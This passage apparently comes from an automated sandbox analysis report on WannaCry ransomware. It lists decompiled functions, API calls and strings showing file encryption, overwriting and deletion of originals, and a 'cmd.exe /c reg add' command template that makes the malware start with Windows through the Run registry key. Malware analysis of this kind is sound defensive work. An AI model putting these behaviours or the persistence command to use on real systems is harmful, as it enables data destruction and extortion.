    • %d%d.bat, xrefs: 1000116B
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004890, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 77
    APIs
      • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
      • Part of subcall function 10001360: CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
      • Part of subcall function 10001360: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
    • GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
    • sprintf.MSVCRT ref: 100048F0
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    • CreateProcessA.KERNEL32 ref: 1000495F
    • CloseHandle.KERNEL32(?), ref: 10004975
    • CloseHandle.KERNEL32(?), ref: 1000497C
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10002BA0, Relevance: 15.1, APIs: 10, Instructions: 133
    APIs
    • wcslen.MSVCRT ref: 10002BD9
    • EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
    • wcslen.MSVCRT ref: 10002C15
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 10002C23
    • ??2@YAPAXI@Z.MSVCRT ref: 10002C57
      • Part of subcall function 10003810: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
      • Part of subcall function 10003810: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
      • Part of subcall function 10003810: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
      • Part of subcall function 10003810: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
      • Part of subcall function 10003810: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
      • Part of subcall function 10003810: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
      • Part of subcall function 10003810: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
    • LeaveCriticalSection.KERNEL32(?), ref: 10002CB8
    • ??3@YAXPAX@Z.MSVCRT ref: 10002CD6
    • LeaveCriticalSection.KERNEL32(?), ref: 10002CE3
      • Part of subcall function 10003010: GetFileAttributesW.KERNEL32(?,768ED335,?,?,10002BEC,?,?,?,10006E59,000000FF,100022E7,?), ref: 10003025
      • Part of subcall function 10003010: SetFileAttributesW.KERNEL32(?,00000000), ref: 10003044
      • Part of subcall function 10003010: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 10003059
      • Part of subcall function 10003010: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1000308A
      • Part of subcall function 10003010: GetFileSizeEx.KERNEL32(00000000,?,00000000), ref: 100030AA
      • Part of subcall function 10003010: SetFilePointer.KERNEL32(00000000,FFFFFC00,00000000,00000002), ref: 1000314C
      • Part of subcall function 10003010: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000316F
      • Part of subcall function 10003010: FlushFileBuffers.KERNEL32(00000000), ref: 10003176
      • Part of subcall function 10003010: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 10003183
      • Part of subcall function 10003010: WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 100031C8
      • Part of subcall function 10003010: CloseHandle.KERNEL32(00000000), ref: 100031EA
    • wcslen.MSVCRT ref: 10002D04
    • DeleteFileW.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002D12
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100014A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85
    APIs
    Strings
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100014AE
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10006940, Relevance: 12.2, APIs: 8, Instructions: 209
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
      • Part of subcall function 10006640: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006659
      • Part of subcall function 10006640: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006669
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003810, Relevance: 10.6, APIs: 7, Instructions: 139
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000386E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 10003876
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 100038AD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 100038BA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 100038C2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 100038F9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,00000000,?,-00000008,10006E81,000000FF,10002C8A,-00000008,?), ref: 1000393A
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001760, Relevance: 10.6, APIs: 7, Instructions: 58
    APIs
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    • GlobalFree.KERNEL32(?), ref: 10001797
    • GlobalFree.KERNEL32(?), ref: 100017C0
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100017E3
    • CloseHandle.KERNEL32(?), ref: 100017F0
    • DeleteCriticalSection.KERNEL32(?,?,00000000,100016B2,76E6C426,76E6EA18,00000000,?,00000000,10006DEF,000000FF,10005AC5), ref: 10001807
    • wcslen.MSVCRT ref: 10001814
    • DeleteFileW.KERNEL32(?,76E6DE72), ref: 10001822
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005DC0, Relevance: 9.4, APIs: 6, Instructions: 375
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
    • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001830, Relevance: 9.1, APIs: 6, Instructions: 61
    APIs
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003AC0: CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
    • GlobalAlloc.KERNEL32(00000000,00100000,10005340,00000000,76E6C426,00000000,1000580C,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10001869
    • GlobalAlloc.KERNEL32(00000000,00100000), ref: 10001881
    • InitializeCriticalSection.KERNEL32(?), ref: 10001899
    • CreateThread.KERNEL32(00000000,00000000,100029E0,?,00000000,00000000), ref: 100018AD
    • GetTickCount.KERNEL32 ref: 100018CD
    • srand.MSVCRT ref: 100018D4
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005727, Relevance: 9.1, APIs: 6, Instructions: 58
    APIs
    • GetLogicalDrives.KERNEL32 ref: 10005734
    • Sleep.KERNEL32(00000BB8), ref: 1000574A
    • GetLogicalDrives.KERNEL32 ref: 10005752
    • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
    • CloseHandle.KERNEL32(00000000), ref: 1000579A
    • ExitThread.KERNEL32 ref: 100057B1
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005730, Relevance: 9.0, APIs: 6, Instructions: 49
    APIs
    • GetLogicalDrives.KERNEL32 ref: 10005734
    • Sleep.KERNEL32(00000BB8), ref: 1000574A
    • GetLogicalDrives.KERNEL32 ref: 10005752
    • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
    • CloseHandle.KERNEL32(00000000), ref: 1000579A
    • ExitThread.KERNEL32 ref: 100057B1
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004990, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
    APIs
    • time.MSVCRT ref: 100049A8
    • time.MSVCRT ref: 100049CC
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 10004890: GetFullPathNameA.KERNEL32(@WanaDecryptor@.exe,00000208,?,00000000), ref: 100048D3
      • Part of subcall function 10004890: sprintf.MSVCRT ref: 100048F0
      • Part of subcall function 10004890: CreateProcessA.KERNEL32 ref: 1000495F
      • Part of subcall function 10004890: CloseHandle.KERNEL32(?), ref: 10004975
      • Part of subcall function 10004890: CloseHandle.KERNEL32(?), ref: 1000497C
    • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 10004A15
      • Part of subcall function 100047F0: sprintf.MSVCRT ref: 10004863
    • Sleep.KERNEL32(00007530), ref: 10004A29
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004500, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50
    APIs
    • sprintf.MSVCRT ref: 10004528
    • GetFileAttributesA.KERNEL32(?), ref: 1000453C
    • GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
      • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,76E76DBE,10004558), ref: 10003A28
      • Part of subcall function 10003D10: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,76E76DBE,00000000), ref: 10003E2B
      • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003E3B
      • Part of subcall function 10003D10: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,76E76DBE,00000000), ref: 10003E70
      • Part of subcall function 10003D10: strncmp.MSVCRT(00000000,76E76DBE,?,?,?,?,?,76E76DBE,00000000), ref: 10003EA1
      • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003EB4
      • Part of subcall function 10003A60: DeleteCriticalSection.KERNEL32(?,100045A2), ref: 10003A6A
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100047F0, Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 46
    APIs
      • Part of subcall function 10001360: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,768DF708), ref: 1000139C
      • Part of subcall function 10001360: CheckTokenMembership.ADVAPI32(00000000,?,768DF708,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
      • Part of subcall function 10001360: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
      • Part of subcall function 100014A0: GetComputerNameW.KERNEL32(?,?), ref: 100014D6
      • Part of subcall function 100014A0: wcslen.MSVCRT ref: 100014EE
      • Part of subcall function 100014A0: wcslen.MSVCRT ref: 1000150E
      • Part of subcall function 100014A0: srand.MSVCRT ref: 10001518
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001527
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001548
      • Part of subcall function 100014A0: rand.MSVCRT ref: 10001564
    • sprintf.MSVCRT ref: 10004863
      • Part of subcall function 10001080: CreateProcessA.KERNEL32 ref: 100010D3
      • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?), ref: 100010EB
      • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
      • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001121
      • Part of subcall function 10001080: CloseHandle.KERNEL32(?), ref: 10001128
    Strings
    • M, xrefs: 10004819
    • L, xrefs: 10004814
    • cmd.exe /c reg add %s /v "%s" /t REG_SZ /d "\"%s\"" /f, xrefs: 1000485D
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 100047FD
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10002940, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
    APIs
      • Part of subcall function 10002200: wcscpy.MSVCRT ref: 1000222D
      • Part of subcall function 10002200: wcsrchr.MSVCRT ref: 10002236
      • Part of subcall function 10002200: _wcsicmp.MSVCRT ref: 1000224B
      • Part of subcall function 10002200: wcscpy.MSVCRT ref: 1000225E
      • Part of subcall function 10002200: wcscat.MSVCRT ref: 1000226F
      • Part of subcall function 10002200: swprintf.MSVCRT(?,%s%s,?,.WNCYR,?,?,?,?), ref: 10002291
      • Part of subcall function 10002200: GetFileAttributesW.KERNEL32(?), ref: 1000229F
      • Part of subcall function 10002200: DeleteFileW.KERNEL32(?,?,?,?), ref: 100022C3
    • wcscat.MSVCRT ref: 1000298D
    • wcscat.MSVCRT ref: 1000299B
    • DeleteFileW.KERNEL32(?), ref: 100029B2
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100012D0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
    APIs
      • Part of subcall function 100011D0: GetCurrentProcess.KERNEL32 ref: 100011E4
      • Part of subcall function 100011D0: OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
      • Part of subcall function 100011D0: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 10001214
      • Part of subcall function 100011D0: GetLastError.KERNEL32 ref: 1000121A
      • Part of subcall function 100011D0: GlobalAlloc.KERNEL32(00000040,?), ref: 10001234
      • Part of subcall function 100011D0: GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 1000124E
      • Part of subcall function 100011D0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 1000125F
      • Part of subcall function 100011D0: GetProcAddress.KERNEL32(00000000,ConvertSidToStringSidW), ref: 10001275
      • Part of subcall function 100011D0: wcscpy.MSVCRT ref: 100012AB
      • Part of subcall function 100011D0: GlobalFree.KERNEL32(00000000), ref: 100012B9
    • GetUserNameW.ADVAPI32 ref: 10001321
    • _wcsicmp.MSVCRT ref: 10001331
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005120, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30
    APIs
      • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
      • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
      • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
      • Part of subcall function 10005060: swprintf.MSVCRT(?,%C:\%s,?,$RECYCLE), ref: 100050DC
      • Part of subcall function 10005060: CreateDirectoryW.KERNEL32(?,00000000), ref: 100050E8
      • Part of subcall function 10005060: sprintf.MSVCRT ref: 100050FE
    • swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
    • DeleteFileW.KERNEL32(?), ref: 10005174
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001910, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
    APIs
    • wcscpy.MSVCRT ref: 10001920
    • swprintf.MSVCRT(?,%s\%d%s,?,?,.WNCRYT), ref: 1000194B
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100027F0, Relevance: 6.1, APIs: 4, Instructions: 111
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000281A
      • Part of subcall function 10002300: ??2@YAPAXI@Z.MSVCRT ref: 10002332
      • Part of subcall function 10002300: swprintf.MSVCRT ref: 10002388
      • Part of subcall function 10002300: FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002442
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002459
      • Part of subcall function 10002300: swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
      • Part of subcall function 10002300: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
      • Part of subcall function 10002300: wcslen.MSVCRT ref: 100024CC
      • Part of subcall function 10002300: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
      • Part of subcall function 10002300: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002535
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 1000254C
      • Part of subcall function 10002300: wcscmp.MSVCRT ref: 10002563
      • Part of subcall function 10002300: wcsncpy.MSVCRT ref: 100025D7
      • Part of subcall function 10002300: wcsncpy.MSVCRT ref: 100025EE
      • Part of subcall function 10002300: FindNextFileW.KERNELBASE(?,?), ref: 10002634
      • Part of subcall function 10002300: FindClose.KERNEL32(?), ref: 10002643
      • Part of subcall function 10002300: _wcsnicmp.MSVCRT ref: 100026A7
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002772
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100027A2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100027BC
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000298D
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000299B
      • Part of subcall function 10002940: DeleteFileW.KERNEL32(?), ref: 100029B2
    • ??3@YAXPAX@Z.MSVCRT ref: 10002899
      • Part of subcall function 10002BA0: wcslen.MSVCRT ref: 10002BD9
      • Part of subcall function 10002BA0: EnterCriticalSection.KERNEL32(?,?,10006E59,000000FF,100022E7,?), ref: 10002BFA
